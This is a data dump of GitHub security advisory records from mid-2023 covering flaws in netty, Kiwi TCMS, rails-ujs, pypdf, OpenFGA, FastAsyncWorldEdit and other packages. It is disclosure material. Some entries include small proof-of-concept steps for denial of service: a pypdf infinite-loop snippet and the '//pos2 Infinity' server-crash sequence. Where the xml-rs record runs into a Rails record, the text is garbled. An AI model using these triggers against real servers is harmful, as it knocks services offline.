{'fixed': '4.1.94.Final'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/netty/netty/security/advisories/GHSA-6mjq-h674-j845'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34462'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/commit/535da17e45201ae4278c0479e6162bb4127d4c32'}, {'type': 'PACKAGE', 'url': 'https://github.com/netty/netty'}]","{'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-20T16:33:22Z', 'nvd_published_at': None}" 1.4.0,GHSA-wfg4-322g-9vqv,2023-06-21T22:06:29Z,2023-06-21T22:06:29Z,,[],memoffset allows reading uninitialized memory,"memoffset allows attempt of reading data from address `0` with arbitrary type. This behavior is an undefined behavior because address `0` to `std::mem::size_of` may not have valid bit-pattern with `T`. Old implementation dereferences uninitialized memory obtained from `std::mem::align_of`. Older implementation prior to it allows using uninitialized data obtained from `std::mem::uninitialized` with arbitrary type then compute offset by taking the address of field-projection. This may also result in an undefined behavior for ""father"" that includes (directly or transitively) type that [does not allow to be uninitialized](https://doc.rust-lang.org/nightly/reference/behavior-considered-undefined.html). This flaw was corrected by using `std::ptr::addr_of` in . ",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'memoffset'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Gilnaa/memoffset/issues/24'}, {'type': 'WEB', 'url': 'https://github.com/Gilnaa/memoffset/pull/50'}, {'type': 'PACKAGE', 'url': 'https://github.com/Gilnaa/memoffset'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0045.html'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T22:06:29Z', 'nvd_published_at': None}" 1.4.0,GHSA-2fqm-m4r2-fh98,2023-06-06T16:46:16Z,2023-06-06T16:46:16Z,,['CVE-2023-33977'],kiwitcms vulnerable to stored cross-site scripting via unrestricted file upload,"### Impact Kiwi TCMS allows users to upload attachments to test plans, test cases, etc. Earlier versions of Kiwi TCMS had introduced upload validators in order to prevent potentially dangerous files from being uploaded and Content-Security-Policy definition to prevent cross-site-scripting attacks. The upload validation checks were not 100% robust which left the possibility to circumvent them and upload a potentially dangerous file which allows execution of arbitrary JavaScript in the browser. Additionally we've discovered that Nginx's `proxy_pass` directive will strip some headers negating protections built into Kiwi TCMS when served behind a reverse proxy. ### Patches - Improved file upload validation code - Updated Nginx reverse proxy configuration for ***.tenant.kiwitcms.org** ### Workarounds If serving Kiwi TCMS behind a reverse proxy make sure that additional header values are still passed to the client browser. If they aren't redefine them inside the proxy configuration. See [etc/nginx.conf#L66-L68](https://github.com/kiwitcms/Kiwi/blob/master/etc/nginx.conf#L66-L68) and [etc/nginx.conf#L87](https://github.com/kiwitcms/Kiwi/blob/master/etc/nginx.conf#L87) ### References Disclosed by [M Nadeem Qazi](https://huntr.dev/bounties/6aea9a26-e29a-467b-aa5a-f767f0c2ec96/).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'kiwitcms'}, 'ecosystem_specific': {'affected_functions': ['tcms.kiwi_attachments.validators.deny_uploads_containing_script_tag']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 12.3'}}]","[{'type': 'WEB', 'url': 'https://github.com/kiwitcms/Kiwi/security/advisories/GHSA-2fqm-m4r2-fh98'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33977'}, {'type': 'WEB', 'url': 'https://github.com/kiwitcms/kiwi/commit/d789f4b51025de4f8c747c037d02e1b0da80b034'}, {'type': 'PACKAGE', 'url': 'https://github.com/kiwitcms/Kiwi'}, {'type': 'WEB', 'url': 'https://github.com/kiwitcms/Kiwi/blob/master/etc/nginx.conf#L66-L68'}, {'type': 'WEB', 'url': 'https://github.com/kiwitcms/Kiwi/blob/master/etc/nginx.conf#L87'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/6aea9a26-e29a-467b-aa5a-f767f0c2ec96/'}, {'type': 'WEB', 'url': 'https://kiwitcms.org/blog/kiwi-tcms-team/2023/06/06/kiwi-tcms-124/'}]","{'cwe_ids': ['CWE-434', 'CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T16:46:16Z', 'nvd_published_at': None}" 1.4.0,GHSA-jr66-9ghf-6gp3,2023-06-16T17:56:21Z,2023-06-11T12:30:16Z,,['CVE-2023-3192'],Froxlor Session Fixation vulnerability,Versions of froxlor/froxlor prior to release 2.1.0 did not regenerate session ids appropriately which may result in session fixation. ,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'froxlor/froxlor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3192'}, {'type': 'WEB', 'url': 'https://github.com/froxlor/froxlor/commit/94d9c3eedf31bc8447e3aa349e32880dde02ee52'}, {'type': 'PACKAGE', 'url': 'https://github.com/froxlor/froxlor'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/f3644772-9c86-4f55-a0fa-aeb11f411551'}]","{'cwe_ids': ['CWE-384'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-12T18:38:30Z', 'nvd_published_at': None}" 1.4.0,GHSA-xp5h-f8jf-rc8q,2023-06-09T22:41:16Z,2023-06-09T22:41:16Z,,['CVE-2023-23913'],rails-ujs vulnerable to DOM Based Cross-site Scripting contenteditable HTML Elements,"NOTE: rails-ujs is part of Rails/actionview since 5.1.0. There is a potential DOM based cross-site scripting issue in rails-ujs which leverages the Clipboard API to target HTML elements that are assigned the contenteditable attribute. This has the potential to occur when pasting malicious HTML content from the clipboard that includes a data-method, data-remote or data-disable-with attribute. This vulnerability has been assigned the CVE identifier CVE-2023-23913. Not affected: < 5.1.0 Versions Affected: >= 5.1.0 Fixed Versions: 6.1.7.3, 7.0.4.3 Impact If the specified malicious HTML clipboard content is provided to a contenteditable element, this could result in the arbitrary execution of javascript on the origin in question. Releases The FIXED releases are available at the normal locations. Workarounds We recommend that all users upgrade to one of the FIXED versions. In the meantime, users can attempt to mitigate this vulnerability by removing the contenteditable attribute from elements in pages that rails-ujs will interact with. Patches To aid users who aren’t able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset. * rails-ujs-data-method-contenteditable-6-1.patch - Patch for 6.1 series * rails-ujs-data-method-contenteditable-7-0.patch - Patch for 7.0 series Please note that only the 7.0.Z and 6.1.Z series are supported at present, and 6.0.Z for severe vulnerabilities. Users of earlier unsupported releases are advised to upgrade as soon as possible as we cannot guarantee the continued availability of security fixes for unsupported releases. Credits We would like to thank ryotak 15 for reporting this! * rails-ujs-data-method-contenteditable-6-1.patch (8.5 KB) * rails-ujs-data-method-contenteditable-7-0.patch (8.5 KB) * rails-ujs-data-method-contenteditable-main.patch (8.9 KB) ",[],"[{'package': {'ecosystem': 'RubyGems', 'name': 'actionview'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.0'}, {'fixed': '6.1.7.3'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'actionview'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.4.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rails/rails/commit/5037a13614d71727af8a175063bcf6ba1a74bdbd'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/commit/73009ea59a811b28e8ec2a9c9bc24635aa891214'}, {'type': 'WEB', 'url': 'https://discuss.rubyonrails.org/t/cve-2023-23913-dom-based-cross-site-scripting-in-rails-ujs-for-contenteditable-html-elements/82468'}, {'type': 'PACKAGE', 'url': 'https://github.com/rails/rails'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionview/CVE-2023-23913.yml'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T22:41:16Z', 'nvd_published_at': None}" 1.4.0,GHSA-p2qf-9vp6-3jjq,2023-06-26T22:41:59Z,2023-06-15T15:30:15Z,,['CVE-2023-3276'],HuTool XML parsing module has blind XXE vulnerability,"A vulnerability, which was classified as problematic, has been found in Dromara HuTool up to 5.8.19. Affected by this issue is the function readBySax of the file XmlUtil.java of the component XML Parsing Module. The manipulation leads to xml external entity reference.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'cn.hutool:hutool-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.8.19'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3276'}, {'type': 'WEB', 'url': 'https://fbdhhhh47.github.io/2023/06/06/hutool-XXE/'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.231626'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.231626'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-16T19:39:29Z', 'nvd_published_at': None}" 1.4.0,GHSA-7grw-xfx6-qhx6,2023-07-06T21:39:16Z,2023-06-30T15:30:22Z,,['CVE-2023-37298'],Joplin Cross-site Scripting vulnerability,Joplin before 2.11.5 allows XSS via a USE element in an SVG document.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'joplin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37298'}, {'type': 'WEB', 'url': 'https://github.com/laurent22/joplin/commit/caf66068bfc474bbfd505013076ed173cd90ca83'}, {'type': 'PACKAGE', 'url': 'https://github.com/laurent22/joplin'}, {'type': 'WEB', 'url': 'https://github.com/laurent22/joplin/releases/tag/v2.11.5'}, {'type': 'WEB', 'url': 'https://vuln.ryotak.net/advisories/69'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:39:28Z', 'nvd_published_at': None}" 1.4.0,GHSA-r7wr-4w5q-55m6,2023-06-16T17:47:56Z,2023-06-16T17:47:56Z,,['CVE-2023-34242'],Cilium vulnerable to information leakage via incorrect ReferenceGrant handling,"### Impact When the [Gateway API](https://docs.cilium.io/en/v1.13/network/servicemesh/gateway-api/gateway-api/) is enabled in Cilium, the absence of a check on the namespace in which a [ReferenceGrant](https://gateway-api.sigs.k8s.io/api-types/referencegrant/) is created could result in Cilium gaining visibility of secrets (including certificates) and services across namespaces. An attacker on an affected cluster can configure Cilium to use cluster secrets or communicate with services that it should not have access to. Gateway API functionality is disabled by default. ### Patches This vulnerability is fixed in Cilium release 1.13.4. Cilium versions <1.13 are not affected. ### Workarounds There is no workaround to this issue. ### Acknowledgements The Cilium community has worked together with members of Isovalent to prepare these mitigations. Special thanks to @meyskens for investigating and fixing the issue. ### For more information If you have any questions or comments about this advisory, please reach out on [Slack](https://docs.cilium.io/en/latest/community/community/#slack). As usual, if you think you found a related vulnerability, we strongly encourage you to report security vulnerabilities to our private security mailing list: [security@cilium.io](mailto:security@cilium.io) - first, before disclosing them in any public forums. This is a private mailing list where only members of the Cilium internal security team are subscribed to, and is treated as top priority. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/cilium/cilium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.13.0'}, {'fixed': '1.13.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cilium/cilium/security/advisories/GHSA-r7wr-4w5q-55m6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34242'}, {'type': 'PACKAGE', 'url': 'https://github.com/cilium/cilium'}, {'type': 'WEB', 'url': 'https://github.com/cilium/cilium/releases/tag/v1.13.4'}]","{'cwe_ids': ['CWE-200'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-16T17:47:56Z', 'nvd_published_at': None}" 1.4.0,GHSA-j6v2-mwxm-f952,2023-07-06T21:39:34Z,2023-06-29T21:30:29Z,,['CVE-2020-26709'],py-xml XML External Entity Injection vulnerability,py-xml v1.0 was discovered to contain an XML External Entity Injection (XXE) vulnerability which allows attackers to execute arbitrary code via a crafted XML file.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'py-xml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26709'}, {'type': 'WEB', 'url': 'https://github.com/PinaeOS/py-xml/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/PinaeOS/py-xml'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/py-xml/PYSEC-2023-95.yaml'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:36:36Z', 'nvd_published_at': None}" 1.4.0,GHSA-ch48-9r3q-pv7x,2023-06-22T20:01:03Z,2023-06-22T20:01:03Z,,['CVE-2023-25500'],Vaadin vulnerable to possible information disclosure of class and method names in RPC response,"### Description Possible information disclosure in Vaadin 10.0.0 to 10.0.23, 11.0.0 to 14.10.1, 15.0.0 to 22.0.28, 23.0.0 to 23.3.13, 24.0.0 to 24.0.6, 24.1.0.alpha1 to 24.1.0.rc2, resulting in potential information disclosure of class and method names in RPC responses by sending modified requests. https://vaadin.com/security/cve-2023-25500","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.21'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'fixed': '2.9.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '9.1.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '23.0.0'}, {'fixed': '23.3.13'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '24.0.0'}, {'fixed': '24.0.9'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '24.1.alpha1'}, {'fixed': '24.1.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.0.24'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '14.10.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0.0'}, {'fixed': '22.1.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '23.0.0'}, {'fixed': '23.3.14'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '24.0.0'}, {'fixed': '24.0.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '24.1.0.alpha1'}, {'fixed': '24.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/platform/security/advisories/GHSA-ch48-9r3q-pv7x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25500'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/16935'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/platform'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2023-25500'}]","{'cwe_ids': ['CWE-1295', 'CWE-200'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T20:01:03Z', 'nvd_published_at': None}" 1.4.0,GHSA-4vvm-4w3v-6mr8,2023-07-07T17:19:37Z,2023-06-30T20:33:57Z,,['CVE-2023-36464'],pypdf and PyPDF2 possible Infinite Loop when a comment isn't followed by a character,"### Impact An attacker who uses this vulnerability can craft a PDF which leads to an infinite loop if `__parse_content_stream` is executed. This infinite loop blocks the current process and can utilize a single core of the CPU by 100%. It does not affect memory usage. That is, for example, the case if the user extracted text from such a PDF. Example Code and a PDF that causes the issue: ```python from pypdf import PdfReader # https://objects.githubusercontent.com/github-production-repository-file-5c1aeb/3119517/11367871?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20230627%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230627T201018Z&X-Amz-Expires=300&X-Amz-Signature=d71c8fd9181c4875f0c04d563b6d32f1d4da6e7b2e6be2f14479ce4ecdc9c8b2&X-Amz-SignedHeaders=host&actor_id=1658117&key_id=0&repo_id=3119517&response-content-disposition=attachment%3Bfilename%3DMiFO_LFO_FEIS_NOA_Published.3.pdf&response-content-type=application%2Fpdf reader = PdfReader(""MiFO_LFO_FEIS_NOA_Published.3.pdf"") page = reader.pages[0] page.extract_text() ``` The issue was introduced with https://github.com/py-pdf/pypdf/pull/969 ### Patches The issue was fixed with https://github.com/py-pdf/pypdf/pull/1828 ### Workarounds It is recommended to upgrade to `pypdf>=3.9.0`. PyPDF2 users should migrate to pypdf. If you cannot update your version of pypdf, you should modify `pypdf/generic/_data_structures.py`: ``` OLD: while peek not in (b""\r"", b""\n""): NEW: while peek not in (b""\r"", b""\n"", b""""): ```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pypdf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '3.9.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'PyPDF2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'last_affected': '3.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/py-pdf/pypdf/security/advisories/GHSA-4vvm-4w3v-6mr8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36464'}, {'type': 'WEB', 'url': 'https://github.com/py-pdf/pypdf/pull/1828'}, {'type': 'WEB', 'url': 'https://github.com/py-pdf/pypdf/pull/969'}, {'type': 'WEB', 'url': 'https://github.com/py-pdf/pypdf/commit/b0e5c689df689ab173df84dacd77b6fc3c161932'}, {'type': 'PACKAGE', 'url': 'https://github.com/py-pdf/pypdf'}, {'type': 'WEB', 'url': 'https://github.com/py-pdf/pypdf/releases/tag/3.9.0'}]","{'cwe_ids': ['CWE-835'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:33:57Z', 'nvd_published_at': None}" 1.4.0,GHSA-7gf7-jv65-wjmh,2023-06-13T22:40:01Z,2023-06-05T06:30:15Z,,['CVE-2023-34411'],xml-rs vulnerable to denial of service via invalid token in XML document,The xml-rs crate >= 0.8.9 and < 0.8.14 for Rust and Crab allows a denial of service (panic) via an invalid = 7.0.x). # Releases The FIXED releases are available at the normal locations. # Workarounds Avoid providing user supplied URLs with arbitrary schemes to the `redirect_to` method. ",[],"[{'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.1.7.4'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.5.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rails/rails/commit/1c3f93d1e90a3475f9ae2377ead25ccf11f71441'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/commit/c9ab9b32bcdcfd8bcd55907f6c7b20b4e004cc23'}, {'type': 'WEB', 'url': 'https://discuss.rubyonrails.org/t/cve-2023-28362-possible-xss-via-user-supplied-values-to-redirect-to/83132'}, {'type': 'PACKAGE', 'url': 'https://github.com/rails/rails'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2023-28362.yml'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-29T15:03:16Z', 'nvd_published_at': None}" 1.4.0,GHSA-rx62-5cw6-x29q,2023-06-19T22:46:24Z,2023-06-18T09:30:17Z,,['CVE-2023-3308'],Whaleal IceFrog is vulnerable to deserialization ,Whaleal IceFrog v1.1.8 component Aviator Template Engine is vulnerable to deserialization of untrusted data. The application deserializes untrusted data without sufficiently verifying that the resulting data will be valid.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.whaleal.icefrog:icefrog-all'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.1.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3308'}, {'type': 'WEB', 'url': 'https://github.com/NanKeXXX/selfVuln_poc/blob/main/whaleal%3Aicefrog/icefrog_1.1.8_RCE.md'}, {'type': 'PACKAGE', 'url': 'https://github.com/whaleal/icefrog'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.231804'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.231804'}]","{'cwe_ids': ['CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-19T22:46:24Z', 'nvd_published_at': None}" 1.4.0,GHSA-hr9r-8phq-5x8j,2023-07-03T18:39:26Z,2023-06-28T22:49:49Z,,['CVE-2023-35933'],OpenFGA vulnerable to denial of service due to circular relationship,"### Overview OpenFGA versions v1.1.0 and prior are vulnerable to a DoS attack when certain Check and ListObjects calls are executed against authorization models that contain circular relationship definitions. ### Am I Affected? You are affected by this vulnerability if you are using OpenFGA v1.1.0 or earlier, and if you are executing certain [Check](https://openfga.dev/api/service#/Relationship%20Queries/Check) or [ListObjects](https://openfga.dev/api/service#/Relationship%20Queries/ListObjects) calls against a vulnerable authorization model. To see which of your models could be vulnerable to this attack, download OpenFGA v1.2.0 and run the following command: ``` ./openfga validate-models --datastore-engine --datastore-uri | jq .[] | select(.Error | contains(""loop"")) ``` replacing the variables `` and `` as needed. ### Fix Upgrade to v1.1.1. ### Backward Compatibility If you are not passing an invalid authorization model (as identified by running `./openfga validate-models`) as a parameter of your Check and ListObjects calls, this upgrade is backwards compatible. Otherwise, OpenFGA v1.1.1 will start returning HTTP 400 status codes on those calls.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/openfga/openfga'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/openfga/openfga/security/advisories/GHSA-hr9r-8phq-5x8j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35933'}, {'type': 'WEB', 'url': 'https://github.com/openfga/openfga/commit/087ce392595f3c319ab3028b5089118ea4063452'}, {'type': 'PACKAGE', 'url': 'https://github.com/openfga/openfga'}, {'type': 'WEB', 'url': 'https://openfga.dev/api/service#/Relationship%20Queries/Check'}, {'type': 'WEB', 'url': 'https://openfga.dev/api/service#/Relationship%20Queries/ListObjects'}]","{'cwe_ids': ['CWE-835'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-28T22:49:49Z', 'nvd_published_at': None}" 1.4.0,GHSA-whj9-m24x-qhhp,2023-06-22T20:00:36Z,2023-06-22T20:00:36Z,,['CVE-2023-35925'],FastAsyncWorldEdit vulnerable to Uncontrolled Resource Consumption,"### Coordinated Disclosure Timeline - 10.06.2023: Issue reported to IntellectualSites - 11.06.2023: Issue is acknowledged - 12.06.2023: Issue has been fixed - 22.06.2023: Advisory has been published ### Impacted version range Before 2.6.3 ### Details #### Proof of Concept As a user, do the following: 1. Select position 1 via `//pos1` 2. Select position 2 adding the ""Infinity"" keyword via `//pos2 Infinity` 3. Execute any further operation. The steps 1 and 2 are interchangeable. #### Impact Such a task has a possibility of bringing the performing server down. #### CVE - CVE-2023-35925 #### Credit This issue was discovered and [reported](https://github.com/IntellectualSites/.github/blob/main/SECURITY.md) by @SuperMonis. ### Solution On June 12, 2023, a patch, https://github.com/IntellectualSites/FastAsyncWorldEdit/pull/2285, has been merged addressing the vulnerability. We strongly recommend users to update their version of FastAsyncWorldEdit to 2.6.3 as soon as possible. ### Workarounds There is no direct mitigation besides updating FastAsyncWorldEdit to a patched version. ### Additional Information Users with access to the `logs/` folder or shell access on their server can try to identify possible abuses of this issue by going through the logs. To sieve through the data, you can use the regex query `\/\/pos[12] Infinity`, then investigate all log entries that return results. ### Disclosure Policy If you discover a security vulnerability within our software, please report the issue according to our [vulnerability disclosure policy](https://github.com/IntellectualSites/.github/blob/main/SECURITY.md).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fastasyncworldedit:FastAsyncWorldEdit-Core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.fastasyncworldedit:FastAsyncWorldEdit-Bukkit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/IntellectualSites/FastAsyncWorldEdit/security/advisories/GHSA-whj9-m24x-qhhp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35925'}, {'type': 'WEB', 'url': 'https://github.com/IntellectualSites/FastAsyncWorldEdit/pull/2285'}, {'type': 'PACKAGE', 'url': 'https://github.com/IntellectualSites/FastAsyncWorldEdit'}, {'type': 'WEB', 'url': 'https://github.com/IntellectualSites/FastAsyncWorldEdit/releases/tag/2.6.3'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T20:00:36Z', 'nvd_published_at': None}" 1.4.0,GHSA-4gxf-g5gf-22h4,2023-06-12T18:34:39Z,2023-06-10T06:30:25Z,,['CVE-2023-26132'],dottie vulnerable to Prototype Pollution,"Versions of the package dottie before 2.0.4 are vulnerable to Prototype Pollution due to insufficient checks, via the `set()` function and the current variable in the `/dottie.js` file.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'dottie'}, 'ecosystem_specific': {'affected_functions': ['dottie.set']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26132'}, {'type': 'WEB', 'url': 'https://github.com/mickhansen/dottie.js/commit/7d3aee1c9c3c842720506e131de7e181e5c8db68'}, {'type': 'PACKAGE', 'url': 'https://github.com/mickhansen/dottie.js'}, {'type': 'WEB', 'url': 